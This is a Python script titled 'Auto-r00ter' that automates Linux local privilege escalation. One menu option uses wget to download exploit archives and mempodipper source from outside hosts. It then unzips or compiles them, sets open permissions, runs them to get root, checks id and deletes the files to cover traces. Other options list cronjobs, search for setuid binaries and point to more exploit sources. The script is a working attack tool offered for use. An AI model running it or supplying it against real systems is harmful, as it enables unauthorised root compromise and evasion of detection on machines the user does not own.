#!/usr/bin/python # -*- coding: cp1252 -*- ############################## # Auto-r00ter # # # # # # Released: 11/1/2013 # # Coded By: sakeN # # Usage: python sakeN.py # # Options: 1; 2; 3; 4 # # # ############################## import os import urllib2 import time print " _ _ _ " print " | | | \ | |" print " ___ ____| | _____| \| |" print " / __|/ _ | |/ / _ \ . ` |" print " \__ \ (_| | < __/ |\ |" print " |___/\__,_|_|\_\___\_| \_/" print ("") print ("Auto-r00ter by sakeN") print ("") print ("Options:") print ("1 ==> Download and execute the most common exploits") print ("2 ==> More available exploits") print ("3 ==> Cronjobs, setuids and IFS") print ("4 ==> Help") print ("") r00t = raw_input ("Which Option? > ") print ("") if r00t == "1": print ("[!] Downloading and executing the exploits!") print ("") print ("[!] Please wait untill it finishes...") time.sleep(2) os.system ("wget http://localroot.th3-0utl4ws.com/xploits/2.6.18-164.zip") time.sleep(5) os.system ("unzip 2.6.18-164.zip") time.sleep(3) os.system ("chmod 777 2.6.18-164") time.sleep(3) os.system ("./2.6.18-164") time.sleep(3) os.system ("id") os.system ("rm -rf 2.6.18-164.zip") os.system ("rm -rf 2.6.18-164") time.sleep(1) print ("") print ("[+] 2.6.18-164 executed successfully!") print ("") time.sleep(2) os.system ("wget http://localroot.th3-0utl4ws.com/xploits/h00lyshit.zip") time.sleep(5) os.system ("unzip h00lyshit.zip") time.sleep(3) os.system ("chmod 777 h00lyshit") time.sleep(3) os.system ("./h00lyshit") time.sleep(3) os.system ("id") os.system ("rm -rf h00lyshit.zip") os.system ("rm -rf h00lyshit") time.sleep(1) print ("") print ("[+] h00lyshit executed successfully!") print ("") time.sleep(2) os.system ("wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c") time.sleep(5) os.system ("gcc mempodipper.c -o mempodipper") time.sleep(3) os.system ("chmod 777 mempodipper") time.sleep(3) os.system ("./mempodipper") time.sleep(3) os.system ("id") os.system ("rm -rf mempodipper.c") os.system ("rm -rf mempodipper") time.sleep(1) print ("") print ("[+] mempodipper executed successfully!") print ("") print (" Exploits executed & completed!") print ("[+][=================================>] 100%") time.sleep(2) elif r00t == "2": print ("[+] http://localroot.th3-0utl4ws.com/") print ("[+] http://lmgtfy.com/?q=local+root+exploits") elif r00t == "3": print ("[!] Checking for running cronjobs...") print ("") os.system ("crontab -l") print ("") print ("[+] You can now use the stat command to check if the cronjobs are writable.") print ("[+] Example: stat /bin/example") print ("") print ("[!] Checking for Setuid programs...") os.system ("find / -type f -perm -4000") print ("") print ("[+] IFS Exploit: http://saken27.site40.net/privescalation") elif r00t == "4": print ("Usage: python sakeN.py") print ("") print ("If you tried using Option 1 and you're not r00t, use option 2 to get more exploits") os.system ("u**** -a") print ("") print ("Get the exploit compatible with the kernel version!") print ("") print ("You can also try escalating your privileges using the information from Option 3") else: print ("[-] No matching Option!") print ("[-] Exiting!") exit()